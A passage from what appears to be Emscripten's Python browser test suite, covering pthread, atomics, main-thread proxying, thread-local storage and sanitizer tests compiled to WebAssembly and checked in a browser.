args=['-g2', '-xc', '-std=gnu11', '-pthread', '-s', 'PTHREAD_POOL_SIZE=4', '-s', 'PTHREAD_POOL_SIZE_STRICT=2', '-s', 'TOTAL_MEMORY=64mb'])
# Check that it fails instead of deadlocking on insufficient number of threads in the pool.
self.btest(test_file('pthread', 'test_pthread_c11_threads.c'),
expected='abort:Assertion failed: thrd_create(&t4, thread_main, NULL) == thrd_success',
args=['-g2', '-xc', '-std=gnu11', '-pthread', '-s', 'PTHREAD_POOL_SIZE=3', '-s', 'PTHREAD_POOL_SIZE_STRICT=2', '-s', 'TOTAL_MEMORY=64mb'])
@requires_threads
def test_pthread_in_pthread_pool_size_strict(self):
# Check that it fails when there's a pthread creating another pthread.
self.btest(test_file('pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-g2', '-pthread', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'PTHREAD_POOL_SIZE_STRICT=2'])
# Check that it fails when there's a pthread creating another pthread.
self.btest(test_file('pthread', 'test_pthread_create_pthread.cpp'), expected='-200', args=['-g2', '-pthread', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'PTHREAD_POOL_SIZE_STRICT=2'])
# Test that the emscripten_ atomics api functions work.
@parameterized({
'normal': ([],),
'closure': (['--closure=1'],),
})
@requires_threads
def test_pthread_atomics(self, args=[]):
self.btest(test_file('pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-g1'] + args)
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest(test_file('pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@requires_threads
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS']]:
self.btest(test_file('pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads)
# Test c++ std::thread::hardware_concurrency()
@requires_threads
def test_pthread_hardware_concurrency(self):
self.btest(test_file('pthread', 'test_pthread_hardware_concurrency.cpp'), expected='0', args=['-O2', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE="navigator.hardwareConcurrency"'])
@parameterized({
'join': ('join',),
'wait': ('wait',),
})
@requires_threads
def test_pthread_main_thread_blocking(self, name):
print('Test that we error if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(test_file('pthread', 'main_thread_%s.cpp' % name), expected='abort:Blocking on the main thread is not allowed by default.', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
if name == 'join':
print('Test that by default we just warn about blocking on the main thread.')
self.btest(test_file('pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(test_file('pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD, and even without a pool')
self.btest(test_file('pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that everything works ok when we are on a pthread.')
self.btest(test_file('pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'PROXY_TO_PTHREAD', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-Os']]:
for debug in [[], ['-g']]:
args = opt + debug
print(args)
self.btest(test_file('pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=args + ['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(test_file('pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(test_file('pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# 64 bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(test_file('pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Tests the rest of the remaining GCC atomics after the two above tests.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest(test_file('pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(test_file('pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, also_asmjs=True)
# Test that basic thread creation works.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_create(self):
def test(args):
print(args)
self.btest(test_file('pthread', 'test_pthread_create.cpp'),
expected='0',
args=['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + args,
extra_tries=0) # this should be 100% deterministic
print() # new line
test([])
test(['-O3'])
# TODO: re-enable minimal runtime once the flakiness is figure out,
# https://github.com/emscripten-core/emscripten/issues/12368
# test(['-s', 'MINIMAL_RUNTIME'])
# Test that preallocating worker threads work.
@requires_threads
def test_pthread_preallocates_workers(self):
self.btest(test_file('pthread', 'test_pthread_preallocates_workers.cpp'), expected='0', args=['-O3', '-s', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=4', '-s', 'PTHREAD_POOL_DELAY_LOAD'])
# Test that allocating a lot of threads doesn't regress. This needs to be checked manually!
@requires_threads
def test_pthread_large_pthread_allocation(self):
self.btest(test_file('pthread', 'test_large_pthread_allocation.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=128MB', '-O3', '-s', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=50'], message='Check output from test to ensure that a regression in time it takes to allocate the threads has not occurred.')
# Tests the -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest(test_file('pthread', 'test_pthread_proxy_to_pthread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]:
self.btest(test_file('pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'] + modularize)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
self.btest(test_file('pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest(test_file('pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that threads can rejoin the pool once detached and finished
@requires_threads
def test_std_thread_detach(self):
self.btest(test_file('pthread', 'test_std_thread_detach.cpp'), expected='0', args=['-s', 'USE_PTHREADS'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest(test_file('pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread_cancel() cancels pthread_cond_wait() operation
@requires_threads
def test_pthread_cancel_cond_wait(self):
self.btest_exit(test_file('pthread', 'test_pthread_cancel_cond_wait.cpp'), assert_returncode=1, args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
@no_chrome('pthread_kill hangs chrome renderer, and keep subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest(test_file('pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
self.btest(test_file('pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(test_file('pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
@requires_threads
def test_pthread_attr_getstack(self):
self.btest(test_file('pthread', 'test_pthread_attr_getstack.cpp'), expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest(test_file('pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
self.btest(test_file('pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'INITIAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest(test_file('pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
self.btest(test_file('pthread', 'test_pthread_once.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test against a certain thread exit time handling bug by spawning tons of threads.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_spawns(self):
self.btest(test_file('pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '--closure=1', '-s', 'ENVIRONMENT=web,worker'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(test_file('pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest(test_file('pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ASSERTIONS'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest(test_file('pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
def run(debug):
self.btest(test_file('pthread', 'test_pthread_printf.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'LIBRARY_DEBUG=%d' % debug])
run(debug=True)
run(debug=False)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest(test_file('pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
@requires_threads
def test_pthread_unistd_io_bigint(self):
self.btest_exit(test_file('unistd', 'io.c'), args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'WASM_BIGINT'])
# Test that the main thread is able to use pthread_set/getspecific.
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest(test_file('pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS'], also_asmjs=True)
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest(test_file('pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(test_file('pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args)
@requires_threads
def test_pthread_dispatch_after_exit(self):
self.btest_exit(test_file('pthread', 'test_pthread_dispatch_after_exit.c'), args=['-s', 'USE_PTHREADS'])
# Test the operation of Module.pthreadMainPrefixURL variable
@no_wasm_backend('uses js')
@requires_threads
def test_pthread_custom_pthread_main_url(self):
ensure_dir('cdn')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT(result);
}
''')
# Test that it is possible to define "Module.locateFile" string to locate where worker.js will be loaded from.
create_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-o', 'test.html'])
shutil.move('test.worker.js', os.path.join('cdn', 'test.worker.js'))
shutil.copyfile('test.html.mem', os.path.join('cdn', 'test.html.mem'))
self.run_browser('test.html', '', '/report_result?1')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
create_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-o', 'test2.html'])
try_delete('test.worker.js')
self.run_browser('test2.html', '', '/report_result?1')
# Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), that it's not a deadlock.
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest(test_file('pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(test_file('pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'INITIAL_MEMORY=128MB'])
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS']]:
self.btest(test_file('gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts)
# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest(test_file('pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest(test_file('pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async(self):
self.btest(test_file('pthread', 'call_async.c'), expected='1', args=['-s', 'USE_PTHREADS'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest(test_file('pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread', 'call_sync_on_main_thread.js')])
self.btest(test_file('pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread', 'call_sync_on_main_thread.js')])
self.btest(test_file('pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread', 'call_sync_on_main_thread.js'), '-s', 'EXPORTED_FUNCTIONS=_main,_malloc'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(test_file('pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread', 'call_async_on_main_thread.js')])
self.btest(test_file('pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread', 'call_async_on_main_thread.js')])
self.btest(test_file('pthread', 'call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread', 'call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
for args in [['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')], ['-O3']]:
self.btest(test_file('pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'PTHREAD_POOL_SIZE'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
args = ['-s', 'WASM_ASYNC_COMPILATION=0']
self.btest(test_file('pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'PTHREAD_POOL_SIZE'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest(test_file('pthread', 'test_pthread_clock_drift.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest(test_file('pthread', 'test_pthread_utf8_funcs.cpp'), expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test the emscripten_futex_wake(addr, INT_MAX); functionality to wake all waiters
@requires_threads
def test_pthread_wake_all(self):
self.btest(test_file('pthread', 'test_futex_wake_all.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'INITIAL_MEMORY=64MB', '-s', 'NO_EXIT_RUNTIME'], also_asmjs=True)
# Test that stack base and max correctly bound the stack on pthreads.
@requires_threads
def test_pthread_stack_bounds(self):
self.btest(test_file('pthread', 'test_pthread_stack_bounds.cpp'), expected='1', args=['-s', 'USE_PTHREADS'])
# Test that real `thread_local` works.
@requires_threads
def test_pthread_tls(self):
self.btest(test_file('pthread', 'test_pthread_tls.cpp'), expected='1337', args=['-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
# Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD.
@requires_threads
def test_pthread_tls_main(self):
self.btest(test_file('pthread', 'test_pthread_tls_main.cpp'), expected='1337', args=['-s', 'USE_PTHREADS'])
@requires_threads
def test_pthread_safe_stack(self):
# Note that as the test runs with PROXY_TO_PTHREAD, we set TOTAL_STACK,
# and not DEFAULT_PTHREAD_STACK_SIZE, as the pthread for main() gets the
# same stack size as the main thread normally would.
self.btest(test_file('core', 'test_safe_stack.c'), expected='abort:stack overflow', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'STACK_OVERFLOW_CHECK=2', '-s', 'TOTAL_STACK=64KB'])
@parameterized({
'leak': ['test_pthread_lsan_leak', ['-gsource-map']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_lsan(self, name, args=[]):
self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=leak', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)
@parameterized({
# Reusing the LSan test files for ASan.
'leak': ['test_pthread_lsan_leak', ['-gsource-map']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_asan(self, name, args=[]):
self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)
@requires_threads
def test_pthread_asan_use_after_free(self):
self.btest(test_file('pthread', 'test_pthread_asan_use_after_free.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', test_file('pthread', 'test_pthread_asan_use_after_free.js')])
@requires_threads
def test_pthread_exit_process(self):
args = ['-s', 'USE_PTHREADS',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'PTHREAD_POOL_SIZE=2',
'-s', 'EXIT_RUNTIME',
'-DEXIT_RUNTIME',
'-O0']
args += ['--pre-js', test_file('core', 'pthread', 'test_pthread_exit_runtime.pre.js')]
self.btest(test_file('core', 'pthread', 'test_pthread_exit_runtime.c'), expected='onExit status: 42', args=args)
@requires_threads
def test_pthread_no_exit_process(self):
# Same as above but without EXIT_RUNTIME. In this case we don't expect onExit to
# ever be called.
args = ['-s', 'USE_PTHREADS',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'PTHREAD_POOL_SIZE=2',
'-O0']
args += ['--pre-js', test_file('core', 'pthread', 'test_pthread_exit_runtime.pre.js')]
self.btest(test_file('core', 'pthread', 'test_pthread_exit_runtime.c'), expected='43', args=args)
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
def test_main_thread_em_asm_signatures(self):
self.btest_exit(test_file('core', 'test_em_asm_signatures.cpp'), assert_returncode=121, args=[])
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest_exit(test_file('core', 'test_em_asm_signatures.cpp'), assert_returncode=121, args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'ASSERTIONS'])
@requires_threads
def test_main_thread_async_em_asm(self):
self.btest_exit(test_file('core', 'test_main_thread_async_em_asm.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'ASSERTIONS'])
@requires_threads
def test_main_thread_em_asm_blocking(self):
create_file('page.html', open(test_file('browser', 'test_em_asm_blocking.html')).read())
self.compile_btest([test_file('browser', 'test_em_asm_blocking.cpp'), '-O2', '-o', 'wasm.js', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
self.run_browser('page.html', '', '/report_result?8')
# Test that it is possible to send a signal via calling alarm(timeout), which in turn calls to the signal handler set by signal(SIGALRM, func);
def test_sigalrm(self):
self.btest(test_file('sigalrm.cpp'), expected='0', args=['-O3'])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', test_file('canvas_style_proxy_shell.html'), '--pre-js', test_file('canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(test_file('canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(test_file('custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', test_file('custom_messages_proxy_shell.html'), '--post-js', test_file('custom_messages_proxy_postjs.js')])
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-s', 'WASM=0']
print('plain html')
self.compile_btest([test_file('in_flight_memfile_request.c'), '-o', 'test.js'] + opts)
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
